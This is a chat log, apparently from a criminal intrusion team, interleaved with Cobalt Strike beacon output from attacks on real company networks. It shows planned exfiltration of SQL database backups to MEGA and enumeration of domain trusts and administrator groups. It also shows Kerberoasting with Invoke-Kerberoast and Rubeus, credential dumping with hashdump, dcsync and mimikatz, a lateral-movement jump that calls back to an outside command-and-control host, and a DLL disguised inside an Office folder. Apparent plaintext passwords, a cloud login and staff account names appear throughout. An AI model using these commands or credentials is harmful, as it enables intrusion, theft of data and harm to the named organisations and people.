beacon> shell MEGAclient.exe put -q --ignore-quota-warn F:\SQLBackup\*.bak [*] Tasked beacon to run: MEGAclient.exe put -q --ignore-quota-warn F:\SQLBackup\*.bak [+] host called home, sent: 91 bytes [+] received output: [API:err: 23:56:12] Unable to open local path: \\?\F:\SQLBackup\*.bak beacon> shell MEGAclient.exe put -q --ignore-quota-warn \\\wwsql2\F$\SQLBackup\*.bak [*] Tasked beacon to run: MEGAclient.exe put -q --ignore-quota-warn \\\wwsql2\\F$\SQLBackup\*.bak [+] host called home, sent: 100 bytes [+] received output: [API:err: 23:56:38] Unable to open local path: \\?\\\wwsql2\F$\SQLBackup\*.bak ``Will it work?`` That's what I mean. MEGAclient.exe put -q --ignore-quota-warn *.bak No, it's not like all the backups will fit in there without archiving, but in MEGA you can put *hm in the filename ztclmgplmwfqmcjqfn@wqcefp.com 745jkiJIGSFjer67 ``` I'll upload it here. `QfvqBgx767v14bn6c0JlKw` but you noticed it in general in the intranet they often work by looking at the keywordPDI_backup_2021_01_10_053001_4017258.bak Intranet_backup_2021_01_10_053001_3704801.bak ManagementInfo_backup_2021_01_10_053001_3861023.bak Development_backup_2021_01_10_053001_3392249.bak Financial_backup_2021_01_10_053001_3548530.bak 2гб28,398,080 CCC_backup_2021_01_10_053001_3079732.bak 28 meters``. beacon> shell dir F:\SQLBackup [*] Tasked beacon to run: dir F:\SQLBackup [+] host called home, sent: 47 bytes [+] received output: Volume in drive F is Data Volume Serial Number is 0E12-2B9D Directory of F:\SQLBackup 01/10/2021 10:00 PM . 01/10/2021 10:00 PM . 
```
01/10/2021  05:30 AM       778,129,920 Analysis_backup_2021_01_10_053001_2923480.bak
01/10/2021  05:30 AM     8,176,882,176 Audit_backup_2021_01_10_053001_3079732.bak
01/10/2021  05:30 AM        28,398,080 CCC_backup_2021_01_10_053001_3079732.bak
01/10/2021  05:30 AM       398,543,360 Chemical_backup_2021_01_10_053001_3079732.bak
01/10/2021  05:30 AM         8,999,424 coupons_backup_2021_01_10_053001_3236000.bak
01/10/2021  05:31 AM        81,874,432 damage_backup_2021_01_10_053001_3236000.bak
01/10/2021  05:32 AM     9,034,617,344 datawarehouse_backup_2021_01_10_053001_3392249.bak
01/10/2021  05:31 AM       492,955,136 development_backup_2021_01_10_053001_3392249.bak
01/10/2021  05:34 AM    13,386,831,360 DRB_backup_2021_01_10_053001_3392249.bak
01/10/2021  05:47 AM   125,342,217,728 ElectronicJournals_backup_2021_01_10_053001_3548530.bak
01/10/2021  05:47 AM     1,747,013,120 Financial_backup_2021_01_10_053001_3548530.bak
01/10/2021  05:47 AM       485,575,168 Intranet_backup_2021_01_10_053001_3704801.bak
01/10/2021  05:47 AM     1,256,280,576 Inventory_backup_2021_01_10_053001_3704801.bak
01/10/2021  05:49 AM    12,605,082,112 Labor_backup_2021_01_10_053001_3704801.bak
01/10/2021  05:49 AM        28,398,080 ManagementInfo_backup_2021_01_10_053001_3861023.bak
01/10/2021  05:30 AM         4,024,832 master_backup_2021_01_10_053001_2142238.bak
01/10/2021  05:54 AM     2,821,808,640 Metabase_backup_2021_01_10_053001_4642233.bak
01/10/2021  05:30 AM         2,729,472 model_backup_2021_01_10_053001_2767253.bak
01/10/2021  05:50 AM     3,761,328,640 Morning_backup_2021_01_10_053001_3861023.bak
01/10/2021  05:30 AM        66,149,888 msdb_backup_2021_01_10_053001_2767253.bak
01/10/2021  05:50 AM     2,615,249,408 Payrolll_backup_2021_01_10_053001_3861023.bak
01/10/2021  05:50 AM         3,232,256 PDIPriceBook_backup_2021_01_10_053001_4017258.bak
01/10/2021  05:50 AM     1,482,774,016 PDI_backup_2021_01_10_053001_4017258.bak
01/10/2021  05:52 AM    15,148,882,432 PLUHistory_backup_2021_01_10_053001_4173454.bak
01/10/2021  05:52 AM     1,110,528,512 POSInfo_backup_2021_01_10_053001_4173454.bak
01/10/2021  05:30 AM         8,479,232 ReportServerTempDB_backup_2021_01_10_053001_2923480.bak
01/10/2021  05:30 AM       118,684,160 ReportServer_backup_2021_01_10_053001_2767253.bak
01/10/2021  05:52 AM         3,430,912 Scorecard_Settings_backup_2021_01_10_053001_4173454.bak
01/10/2021  05:53 AM     1,074,877,952 Shared_backup_2021_01_10_053001_4329699.bak
01/10/2021  05:53 AM    11,357,211,136 specialty_backup_2021_01_10_053001_4329699.bak
01/10/2021  05:53 AM       705,843,712 SQI_backup_2021_01_10_053001_4329699.bak
01/10/2021  05:53 AM     2,021,739,008 Swipe_backup_2021_01_10_053001_4485967.bak
01/10/2021  05:54 AM        24,244,736 Test_backup_2021_01_10_053001_4642233.bak
01/10/2021  05:53 AM       242,305,536 Tips_backup_2021_01_10_053001_4485967.bak
01/10/2021  05:53 AM         4,738,560 WWBackOffice_backup_2021_01_10_053001_4642233.bak
              35 File(s) 216,430,061,056 bytes
               2 Dir(s)  787,610,132,480 bytes free
```

Then pick one of your choice from the list above. Won't you get burnt again? I'd take them.

```
WWSQL.waterway.com
name
------------------------------ -----------
CCC                            15549
CCCDenver                      10

WWSQL2.waterway.com
name
------------------------------ -----------
Analysis                       824
datawarehouse                  12105
development                    620
DRB                            24028
Financial                      1676
Payroll                        2633
POSInfo                        1272

PDIPRODSQL.waterway.com
name
------------------------------ -----------
PDICompany_1137_01             43320
```

These backups, which databases to unload? Ladies, what are we talking about? About databases. @tl1 and what is the result? Financial, Development. These are interesting. Which ones to export and upload?
There are no listings. Backups, yeah; there's even a prefix old, they were wiped and that's it. Why are we stopping at it? As much as I have encountered, there's "unreachable" until you find a subnet in which the loss > 0%. There, "unreachable" from other subnets means not pinged; it's rather 100% loss than unreachable. Hahaha, it's like @user7 had 40 servers in AD, but 70 alive. It's like 15 out of 10. I did shell netstat -abn and looked at which ports the sqlservr, sqlwriter processes are running on, and there are just no pings for me, over 100% loss. Well, here are two that aren't pinged, just with the prefix old, and the other two with closed ports `Destination host unreachable.`

```
Teemo[WWDC2]SYSTEM */628|2021Jan15 02:00:34> shell ping WWSQLOLD -n 1
[*] Tasked beacon to run: ping WWSQLOLD -n 1
[+] host called home, sent: 49 bytes
[+] received output:

Pinging WWSQLOLD.waterway.com [192.168.0.37] with 32 bytes of data:
Reply from 192.168.0.222: Destination host unreachable.

Ping statistics for 192.168.0.37:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

Teemo[WWDC2]SYSTEM */628|2021Jan15 02:01:03> shell ping WWSQL2Old -n 1
[*] Tasked beacon to run: ping WWSQL2Old -n 1
[+] host called home, sent: 50 bytes
[+] received output:

Pinging WWSQL2Old.waterway.com [192.168.0.83] with 32 bytes of data:
Reply from 192.168.0.222: Destination host unreachable.

Ping statistics for 192.168.0.83:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
```

```
Teemo[WWDC2]SYSTEM */628|2021Jan15 01:59:00> shell ping PDITESTSQL -n 1
[*] Tasked beacon to run: ping PDITESTSQL -n 1
[+] host called home, sent: 51 bytes
[+] received output:

Pinging PDITESTSQL.waterway.com [192.168.0.127] with 32 bytes of data:
Reply from 192.168.0.127: bytes=32 time=1ms TTL=128

Ping statistics for 192.168.0.127:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 1ms, Maximum = 1ms, Average = 1ms

Teemo[WWDC2]SYSTEM */628|2021Jan15 01:59:21> shell ping wwsql02 -n 1
[*] Tasked beacon to run: ping wwsql02 -n 1
[+] host called home, sent: 48 bytes
[+] received output:

Pinging wwsql02.waterway.com [192.168.0.59] with 32 bytes of data:
Reply from 192.168.0.59: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.0.59:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
```

Are they not pinging? Haven't you tried from other segments? Or are those ports closed?) And you can't get into these without SMB and RDP. Other network segments? Yes, i.e. you can't get to the servers?
@user8 how to find a SQL server
two off and two (PDITESTSQL, wwsql02) do not see anything, no ports 1433,445,3389,139
```
WWSQL.waterway.com
name
---------------------- -----------
AppSettings            14
AuthorizeNet           3736
CCC                    15549
CCCDenver              10
Donations              30
Fundraising            14
GravityForms           903
HotSchedules           39
LocalMarketing         12
Loyalty                201
Silverpop              2993
Timeclock              9298
WooCommerce            104
(13 rows affected)

WWSQL2.waterway.com
name
---------------------- -----------
Analysis               824
Audit                  10825
CCC                    29
Chemical               444
coupons                10
damage                 87
datawarehouse          12105
Development            620
DRB                    24028
ElectronicJournals     150418
Financial              1676
Intranet               3627
Inventory              1331
Labor                  13508
ManagementInfo         30
Metabase               2708
Morning                4934
Payroll                2633
PDI                    1522
PDIPriceBook           4
PLUHistory             15546
POSInfo                1272
ReportServer           31096
ReportServerTempDB     992
Scorecard_Settings     4
Shared                 1084
Specialty              14329
SQI                    1554
Swipe                  5506
Test                   453
Tips                   263
WWBackOffice           6
(32 rows affected)

PDIPRODSQL.waterway.com
name
---------------------- -----------
PDI_Stage_1137_01      3130
PDI_Warehouse_1137_01  6829
PDICompany_1137_01     43320
PDICompany_1137_01_FRx 5
PDICompany_1137_91     34633
PDICompany_1137_91_FRx 4
PDICompany_1137_92     42048
PDICompany_1137_92_FRx 4
PDICompany_1137_93     35983
PDICompany_1137_93_FRx 4
PDICompany_1137_94     37376
PDICompany_1137_94_FRx 4
PDIFoundation_1137     82096
PDIMaster              238
ReportServer           37613
ReportServerTempDB     174
(16 rows affected)
```
@user3 @user9
```
WWSQL.waterway.com
WWSQL2.waterway.com
WWSQLOLD.waterway.com
WWSQL2Old.waterway.com
WWsql02.waterway.com
PDIPRODSQL.waterway.com
PDITESTSQL.waterway.com
```
would like + listings
where?
take away
there is a pst that is 1.png and a 6 gig pst of some itish
post still a couple of pumped out
all you got ready?
ok, i'll yank the cc_data.mdf
it would be nice to pick up their backups?
what's not ready?
hello) :space_invader:
day
you're all set for tomorrow's slip and everything as usual by 11pm
see everything else, mine is no longer fit for me?
hello, everyone, hello
```
dn:CN=PANAVISION,CN=System,DC=panavision,DC=com
>whenCreated: 2005/09/14-17:51:44 Mountain Daylight Time
>name: PANAVISION
>securityIdentifier: S-1-5-21-202912000-196093339-1136263860
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: PANAVISION
>trustType: 1 [Downlevel(1)]
>trustAttributes: 4 [Quarantined-Domain(4)]
```
a bh withdrew.
fuck i don't know... suddenly my lock aca was heard imperesnimu traststranimu how i then removed bh
visibly ldap queries are forbidden... weird
it should work
```
Using server: AUS-DCON-01.ap.panavision.com:3268
Directory: Windows Server 2012 R2

dn:CN=panavision.com,CN=System,DC=ap,DC=panavision,DC=com
>whenCreated: 2006/01/16-15:54:35 Pacific Daylight Time
>name: panavision.com
>securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: panavision.com
>trustType: 2 [UpLevel(2)]
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=panavision.com,CN=System,DC=eu,DC=panavision,DC=com
>whenCreated: 2006/03/02-04:37:35 Pacific Daylight Time
>name: panavision.com
>securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: panavision.com
>trustType: 2 [UpLevel(2)]
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=panavision.com,CN=System,DC=na,DC=panavision,DC=com
>whenCreated: 2005/09/14-16:50:01 Pacific Daylight Time
>name: panavision.com
>securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: panavision.com
>trustType: 2 [UpLevel(2)]
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=PANAVISION,CN=System,DC=panavision,DC=com
>whenCreated: 2005/09/14-16:51:44 Pacific Daylight Time
>name: PANAVISION
>securityIdentifier: S-1-5-21-202912000-196093339-1136263860
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: PANAVISION
>trustType: 1 [Downlevel(1)]
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=eu.panavision.com,CN=System,DC=panavision,DC=com
>whenCreated: 2006/03/02-04:33:06 Pacific Daylight Time
>name: eu.panavision.com
>securityIdentifier: S-1-5-21-2619205848-3123681340-272399168
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: eu.panavision.com
>trustType: 2 [UpLevel(2)]
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=sa.panavision.com,CN=System,DC=panavision,DC=com
>whenCreated: 2007/10/25-01:46:47 Pacific Daylight Time
>name: sa.panavision.com
>securityIdentifier: S-1-5-21-486547592-1649593982-2333919999
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: sa.panavision.com
>trustType: 2 [UpLevel(2)]
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=na.panavision.com,CN=System,DC=panavision,DC=com
>whenCreated: 2005/09/14-16:49:49 Pacific Daylight Time
>name: na.panavision.com
>securityIdentifier: S-1-5-21-4080305880-3103530751-2544733278
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: na.panavision.com
>trustType: 2 [UpLevel(2)]
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=ap.panavision.com,CN=System,DC=panavision,DC=com
>whenCreated: 2006/01/16-15:54:34 Pacific Daylight Time
>name: ap.panavision.com
>securityIdentifier: S-1-5-21-396909831-1571174283-2495636022
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: ap.panavision.com
>trustType: 2 [UpLevel(2)]
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=panavision.com,CN=System,DC=sa,DC=panavision,DC=com
>whenCreated: 2007/10/25-01:47:46 Pacific Daylight Time
>name: panavision.com
>securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: panavision.com
>trustType: 2 [UpLevel(2)]
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=LEEFILTERS.UK,CN=System,DC=panavision,DC=com
>whenCreated: 2018/09/25-16:33:19 Pacific Daylight Time
>name: LEEFILTERS.UK
>securityIdentifier: S-1-5-21-2580217452-235510033-4179086628
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: LEEFILTERS.UK
>trustType: 2 [UpLevel(2)]
>trustAttributes: 24 [Transitive(8);Cross-Organization(16)]

10 Objects returned
```
Well, I mean not in quarantine?
```
beacon> shell adfind.exe -b DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[*] Tasked beacon to run: adfind.exe -b DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[+] host called home, sent: 109 bytes
[+] received output:
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral

beacon> shell adfind.exe -b DC=PANAVISION -f "(objectcategory=person)" > ad_users.txt
[*] Tasked beacon to run: adfind.exe -b DC=PANAVISION -f "(objectcategory=person)" > ad_users.txt
[+] host called home, sent: 102 bytes
[+] received output:
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral

beacon> shell adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[*] Tasked beacon to run: adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[+] host called home, sent:
```
```
115 bytes
[+] received output:
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral
```
```
>name: panavision.com
>name: PANAVISION
>name: eu.panavision.com
>name: sa.panavision.com
>name: na.panavision.com
>name: ap.panavision.com
>name: LEEFILTERS.UK
```
Certain domain is in the trust?
I think I got it right... I'm writing the parameter wrong?
```
beacon> shell adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[*] Tasked beacon to run: adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[+] host called home, sent: 115 bytes
[+] received output:
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral
```
I don't understand what bhs has to do with the trusts?
did you rubeus put on the trusts?
i mean this
) and what does this have to do with bhs?
i mean kerberoast
naught
bhs all the trusts surveyed the domain composition?
and you kerberoast trusts?
khm
g[vloli already acq
YES locked))))0
created also threw
danu in the first you went up yes?
the problem with going to the trusts
those things are
```
DEN-DCON-02.na.panavision.com [DS] Site: Denver
DEN-DCON-01.na.panavision.com [PDC] [DS] Site: Denver
WDH-DCON-02.na.panavision.com [DS] Site: Woodland-Hills
The command completed successfully
=============================================
PDC
Alias name     administrators
Comment        Members can fully administer the computer/domain

Members
-------------------------------------------------------------------------------
Administrator
DEN-DCON-01$
Domain Admins
PVRT\Enterprise Admins
PVRT\wmi.service
=============================================
Group name     Domain Admins
Comment        Designated administrators of the domain

Members
-------------------------------------------------------------------------------
#yromero
adfs.admin
Administrator
BackupMgr
CZambrana_da
exponential
it.deploy
it.inventory
jharris_da
mpatterson_ea
orivera_da
PKooiman_da
sanadmin
SP_Admin
SQLAgent
windchilladmin
yromero_ea
=============================================
```
There's an aha
You here?
I'll fucking explain if I start, it's more confusing, it's easier to actually read it.
TrustDirection is not a power of attorney, read what I threw out
http://www.harmj0y.net/blog/redteaming/the-trustpocalypse/
so is essentially a two-way power of attorney?
http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
why should that affect the trustAttributes?
`>trustDirection: 3 [Inbound(1);Outbound(2)]`
```
dn:CN=PANAVISION,CN=System,DC=panavision,DC=com
>whenCreated: 2005/09/14-16:51:44 Pacific Daylight Time
>name: PANAVISION
>securityIdentifier: S-1-5-21-202912000-196093339-1136263860
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: PANAVISION
>trustType: 1 [Downlevel(1)]
>trustAttributes: 4 [Quarantined-Domain(4)]
```
Can you explain this point?
```
beacon> shell ping -n 1 sa.panavision.com
[*] Tasked beacon to run: ping -n 1 sa.panavision.com
[+] host called home, sent: 58 bytes
[+] received output:

Pinging sa.panavision.com [192.168.64.50] with 32 bytes of data:
Request timed out.

Ping statistics for 192.168.64.50:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
```
And I realized that we have no sa domain
migrate to quarantine domain?
how to google such questions?
in 2 streams
ada what did you scan? just range /24?
too want to work) to the heart... work, but I do not get up with the office tomorrow))) and you?)
yes I am usually here until morning
a what do you do not sleep?
not thick, 2 pcs?
```
[*] 10.100.7.15:445  - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:required) (uptime:3w 0d 14h 29m 10s) (guid:{ce3aadf5-49db-4506-983e-b24acd38dfd6}) (authentication domain:PVRT)
[+] 10.100.7.15:445  -   Host is running Windows 2016 Standard (build:14393) (name:GBL-DCON-01) (authentication domain:PVRT)
[*] 10.100.7.16:445  - Force SMB1 since SMB fingerprint needs native_lm/native_os information
[*] 10.100.7.14:139  - Force SMB1 since SMB fingerprint needs native_lm/native_os information
[*] 10.100.7.16:445  - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:required) (uptime:3d 12h 33m 11s) (guid:{1466eec3-53c0-4eb4-af7e-1dabe2584051}) (authentication domain:PVRT)
[+] 10.100.7.16:445  -   Host is running Windows 2016 Standard (build:14393) (name:GBL-DCON-02) (authentication domain:PVRT)
```
OK, the main thing is to check that all YES in hashdump
3941 in ad_user
3954
ad users long opens
now count the number of users in the domain?
the client itself has hung? or session?
after hashdump see if the cobaltstrike hung)
dcsync does not fit into the file?
you could just do the hashdump on the idea, right?
```
C:\WINDOWS\Temp> del eula.dll
C:\WINDOWS\Temp\eula.dll
Access is denied.

C:\WINDOWS\Temp> whoami
friver\i3bdr
```
I don't think the skis are going wrong
then use ntds util
should be here or not here?
from creds export
@tl1 what is the syntax?
dcsync can't get into the file?
it's holding the process
can't delete the fucking files
```
100666/rw-rw-rw-  139680  fil  2020-10-06 23:01:55 +0200  eula.dll
40777/rwxrwxrwx   0       dir  2012-06-25 19:57:03 +0200  hsperfdata_SYSTEM
100666/rw-rw-rw-  22101   fil  2020-10-06 23:37:06 +0200  mimikatz.log
```
DK in the cob what? Have you got it up? Have you got it up on the grid on your compa
Not understood the question
Do you need to get the system up there?
OK, that was the original task
Da
@tl1 let me first jump (run dll) on the DK, take the dsink, then look for a server, there are lots of options now?
```
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|2020Oct07 01:02:30> shell dir \\SOLARWINDS\C$\Users
[*] Tasked beacon to run: dir \\SOLARWINDS\C$\Users
[+] host called home, sent: 254 bytes
[+] received output:
 Volume in drive \\SOLARWINDS\C$ has no label.
 Volume Serial Number is B6E7-695C

 Directory of \\SOLARWINDS\C$\Users

09/02/2020  02:07 PM    <DIR>          .
09/02/2020  02:07 PM    <DIR>          ..
03/07/2016  10:54 AM    <DIR>          .NET v2.0
03/07/2016  10:54 AM    <DIR>          .NET v2.0 Classic
03/07/2016  10:54 AM    <DIR>          .NET v4.5
03/07/2016  10:54 AM    <DIR>          .NET v4.5 Classic
09/28/2015  10:52 AM    <DIR>          Administrator
04/29/2020  12:07 AM    <DIR>          azure_join@friver.local
03/07/2016  10:54 AM    <DIR>          Classic .NET AppPool
09/10/2018  09:26 AM    <DIR>          frtech
08/07/2020  11:23 AM    <DIR>          KGillisAdmin
06/25/2020  11:14 AM    <DIR>          mfinniganadmin
10/30/2018  02:20 PM    <DIR>          MsDtsServer120
10/30/2018  05:06 PM    <DIR>          MsDtsServer130
07/17/2018  09:52 AM    <DIR>          MSSQLFDLauncher
10/30/2018  02:20 PM    <DIR>          MSSQLSERVER
10/30/2018  02:20 PM    <DIR>          MSSQLServerOLAPService
02/18/2020  10:53 AM    <DIR>          pcrusieadmin
06/22/2015  03:10 PM    <DIR>          Public
10/30/2018  02:20 PM    <DIR>          ReportServer
06/15/2020  10:24 AM    <DIR>          rgoinsadmin
10/30/2018  02:21 PM    <DIR>          SQLSERVERAGENT
10/30/2018  05:22 PM    <DIR>          SQLTELEMETRY
10/30/2018  05:20 PM    <DIR>          SSASTELEMETRY
10/30/2018  05:06 PM    <DIR>          SSISTELEMETRY130
               0 File(s)              0 bytes
              25 Dir(s)  43,644,530,688 bytes free
```
and the to list show me C:\users of this server
aha ok + what's the dll? coba?
`dn:CN=SOLARWINDS,OU=Servers,OU=Corporate,DC=FRIVER,DC=LOCAL`
this is the server
i look for the server
dump the hashes))))) finally the toura
```
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|2020Oct07 00:54:55> shell net use X: \\SOLARWINDS\C$ /user:FRIVER\i3bdr 7Fv(l7c5h)Pq
[*] Tasked beacon to run: net use X: \\SOLARWINDS\C$ /user:FRIVER\i3bdr 7Fv(l7c5h)Pq
[+] host called home, sent: 280 bytes
[+] received output:
The command completed successfully.
```
```
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|2020Oct07 00:51:25> shell net user i3bdr /dom
[*] Tasked beacon to run: net user i3bdr /dom
[+] host called home, sent: 50 bytes
[+] received output:
The request will be processed at a domain controller for domain FRIVER.LOCAL.
```
```
User name                    i3bdr
Full Name                    i3brd Backup
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/21/2016 2:34:30 PM
Password expires             Never
Password changeable          10/24/2016 2:34:30 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   10/6/2020 5:51:26 PM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Deny_Share_access    *CitrixVPNAccess
                             *Domain Users         *SQL Administrators
                             *Domain Admins        *Payroll-SQLAdmins
The command completed successfully.
```
I'm so fucked up, I won't say it again.
```
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|2020Oct07 00:48:15> jump psexec_psh DIV79-FS-01 https
[*] Tasked beacon to run windows/beacon_https/reverse_https (regbest.com:443) on DIV79-FS-01 via Service Control Manager (PSH)
[+] host called home, sent: 214277 bytes
[-] Could not open service control manager on DIV79-FS-01: 1722
[-] Could not connect to pipe (\\DIV79-FS-01\pipe\status_4d6): 53
[+] host called home, sent: 152 bytes
```
Why are we here just for fun)
and check more YES after you take the hashes off the server
as far as possible is not critical
no processes
YES no one has been here for a long time and the server is not a server
Khat?
opaaa
```
Members
-------------------------------------------------------------------------------
ADFS
adminsolar
ayoderadmin
azureadmin
bhilladmin
BlackStratus$
BNelsonAdmin
chailadmin
CRMadmin
cwilsonadmin
datacubepro
dpawlakadmin
FaxAdmin
gkoontzadmin
gzapataadmin
i3bdr
jsteffenadmin
KGillisAdmin
mfinniganadmin
MSOL_43139b2cee97
pcrusieadmin
rgoinsadmin
ScaleService
SCCM-01$
sccmadmin
sonicwalladmin
veeambr
vmadmin
```
user3 mimic if only that was taken off what else?
said that now will take off more
only that was taken off or only that was taken off?
this is not an answer)
took off lehabyl or took off?
only hashdump the rest was taken off?
the car is old, do not check the creed
```
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|2020Oct07 00:30:06> shell net use X: \\cor-crm-02.friver.local\C$ /user:cor-crm-02\Administrator Shotgun913
[*] Tasked beacon to run: net use X: \\cor-crm-02.friver.local\C$ /user:cor-crm-02\Administrator Shotgun913
[+] host called home, sent: 112 bytes
[+] received output:
System error 384 has occurred.

You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
```
Now alexei will run the dll and continue the work
if it works - I'll send it right away
nea (managed to determine the pass from FaxAdmin?
Ok, now I will throw the ad info
na citrix under sox - from there we call kmd and attract citra, I wonder where it will lead
even achivment
vector open
+
`psinject 7288 x64 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\hashes.txt -append -force -encoding UTF8`
Why not, let it lie there
the point of Invoke-Kerberos?
took
+
without admincount
`execute-assembly Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\Rubeus_hashes.txt`
```
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|2020Oct06 18:52:54> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain FRIVER.LOCAL.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members
-------------------------------------------------------------------------------
ADFS                     adminsolar               ayoderadmin
azureadmin               bhilladmin               BlackStratus$
BNelsonAdmin             chailadmin               CRMadmin
cwilsonadmin             datacubepro              dpawlakadmin
FaxAdmin                 gkoontzadmin             gzapataadmin
i3bdr                    jsteffenadmin            KGillisAdmin
mfinniganadmin           MSOL_43139b2cee97        pcrusieadmin
rgoinsadmin              ScaleService             SCCM-01$
sccmadmin                sonicwalladmin           veeambr
vmadmin
The command completed successfully.
```
```
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|2020Oct06 18:57:21> shell net group "Enterprise Admins" /dom
[*] Tasked beacon to run: net group "Enterprise Admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain FRIVER.LOCAL.

Group name     Enterprise Admins
Comment        Designated administrators of the enterprise

Members
-------------------------------------------------------------------------------
pcrusieadmin             rgoinsadmin
The command completed successfully.
```
```
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|2020Oct06 18:58:27> shell net localgroup Administrators
[*] Tasked beacon to run: net localgroup Administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name     Administrators
Comment

Members
-------------------------------------------------------------------------------
Administrator
FRIVER\Domain Admins
FRIVER\Local Desktop Administrators
FRIVER\teledata
FRTech
The command completed successfully.
```
Everything, leave it as it is and just go to lpe and so on
a dll delete or leave it?
keep working
+
not deleted
+
`C:\Users\tkennedy\AppData\Local\Microsoft\Office` - here the dll
`olkexplorer.officeUI.dll` - I'll call it
`7 out.7z file.txt file2.txt file3.txt`
thank you
7z ?))
See you all tomorrow, thank you all))
restart the client
but it that is hanging?
More precisely teem server, probably hangs after lunch
give more sessions
@user1 once said that you need time to put the records on modules and vectors in order, before lunch can do this
yes
The second command helps first from emeralmatherials.com?
Our sessions:
hi
Do they? 2 with the other
2 with one team
a
We're 4 here with the second team yet?
Good morning to all
Good morning
Good morning
Good morning
Greetings)
See you soon) Well, on the 5th at 2 in the office) Thank you))
When all said))
Happy New Year))
Thank you) Likewise, and thanks for bearing all our zatupy, with the New Year, all the best and also more bonuses)
Thanks) Also happy to work with you @tl2 and the guys in the office, very much from you learned.
It was a hard year from all points of view, we went through all sorts of things with you and you have grown a lot since our first meeting, which I am very glad. Especially during the last month you have been working as close as possible and as a team. I am glad we are working together, I hope you will not lose this spirit in the new year. Congratulations to all of you on a happy new year! I wish you happiness, more bonuses, health and a good sleep for the weekend.
Thank you all)
Very fast and can go away)
I will sum up the year in 2 hours)
```
https://wwhq62nas.us2.quickconnect.to/
https://waterway63.us2.quickconnect.to/
```
What time?
Well it's also seen in General
We're coming back on the 5th of the day
I @tl2 said that you came of your own accord
Thank you all for coming today
```
User: mapusatera - IP Address: 192.168.0.164
User: DBunte - IP Address: 192.168.90.2
User: gkeller - IP Address: 192.168.0.162
User: Quser - IP Address: 192.168.13.57
LEVASHENKO-PC: 192.168.0.22 mharper
